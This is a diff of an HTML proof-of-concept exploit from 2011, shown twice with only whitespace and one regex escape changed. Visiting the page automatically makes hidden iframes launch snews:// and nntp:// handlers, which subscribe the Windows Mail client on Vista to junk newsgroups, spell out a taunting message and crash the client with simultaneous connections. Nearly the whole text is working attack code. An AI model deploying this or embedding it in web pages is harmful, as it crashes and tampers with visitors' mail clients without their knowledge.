bcoles · September 16, 2011 16:56
diff --git a/Windows Mail client DoS from browser PoC.html b/Windows Mail client DoS from browser PoC.html
 <script type="text/javascript">

 // Windows Mail client DoS from browser PoC (with nntp/snews/news url handlers)
 // 2011-09-16 // Brendan Coles <[email protected]>

 // Should work with Safari/Firefox on Windows Vista
 // Some newsgroups are added. You can delete newsgroups here:
 // C:\Users\username\AppData\Local\Microsoft\Windows Mail
 function doit() {
 	//window_spam();
 	//newsgroup_spam();
 	msg();
 	dos();
 }

 // write a message using newsgroup names // safari and firefox
 // note: special characters get URL encoded by the Windows Mail client
 function msg() {
 	message="I know what you did last summer . this message was brought to you by the wonderful world of url handlers";
 	for(var i=0;i<(message.split(' ').length);i++) {
 		pad=i+"";
 		while (pad.length < 4) pad = '0' + pad;
 		document.write("<iframe style='display:none' src='snews://"+pad+"-"+message.split(' ')[i]+"/'></iframe>");
 	}
 }

 // DoS // safari and firefox
 // Added newsgroups are removed once Windows Mail closes (unless we crash it)
 // Windows mail crashes on simultaneous connections. 10 should be sufficient.
 function dos() {
 	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='nntp://127.0.0.1:119//'></iframe>");
 }

 // newsgroup spam  // safari only
 // subscribe to 1000 newsgroups
 function newsgroup_spam() {
 	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='snews://"+String.fromCharCode(i)+"//'></iframe>");
 }

 // popup message spam // safari and firefox
 function window_spam() {
 	for(var i=0;i<100;i++) document.write("<iframe style='display:none' src='snews://?"+String.fromCharCode(i)+"//'></iframe>");
 }

 // do it
 if (navigator.userAgent.match('(Windows NT 6)') != null && window.navigator.userAgent.match(/(Firefox|Safari)\/\d/) != null && !window.chrome) doit();
 else document.write("This page must be viewed in Safari or Firefox on Windows Vista.");

 </script>
	<script type="text/javascript">

	// Windows Mail client DoS from browser PoC (with nntp/snews/news url handlers)
	// 2011-09-16 // Brendan Coles <[email protected]>

	// Should work with Safari/Firefox on Windows Vista
	// Some newsgroups are added. You can delete newsgroups here:
	// C:\Users\username\AppData\Local\Microsoft\Windows Mail
	function doit() {
	//window_spam();
	//newsgroup_spam();
	msg();
	dos();
	}

	// write a message using newsgroup names // safari and firefox
	// note: special characters get URL encoded by the Windows Mail client
	function msg() {
	message="I know what you did last summer . this message was brought to you by the wonderful world of url handlers";
	for(var i=0;i<(message.split(' ').length);i++) {
	pad=i+"";
	while (pad.length < 4) pad = '0' + pad;
	document.write("<iframe style='display:none' src='snews://"+pad+"-"+message.split(' ')[i]+"/'></iframe>");
	}
	}

	// DoS // safari and firefox
	// Added newsgroups are removed once Windows Mail closes (unless we crash it)
	// Windows mail crashes on simultaneous connections. 10 should be sufficient.
	function dos() {
	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='nntp://127.0.0.1:119//'></iframe>");
	}

	// newsgroup spam // safari only
	// subscribe to 1000 newsgroups
	function newsgroup_spam() {
	for(var i=0;i<10;i++) document.write("<iframe style='display:none' src='snews://"+String.fromCharCode(i)+"//'></iframe>");
	}

	// popup message spam // safari and firefox
	function window_spam() {
	for(var i=0;i<100;i++) document.write("<iframe style='display:none' src='snews://?"+String.fromCharCode(i)+"//'></iframe>");
	}

	// do it
	if (navigator.userAgent.match('(Windows NT 6)') != null && window.navigator.userAgent.match(/(Firefox\|Safari)\/\d/) != null && !window.chrome) doit();
	else document.write("This page must be viewed in Safari or Firefox on Windows Vista.");

	</script>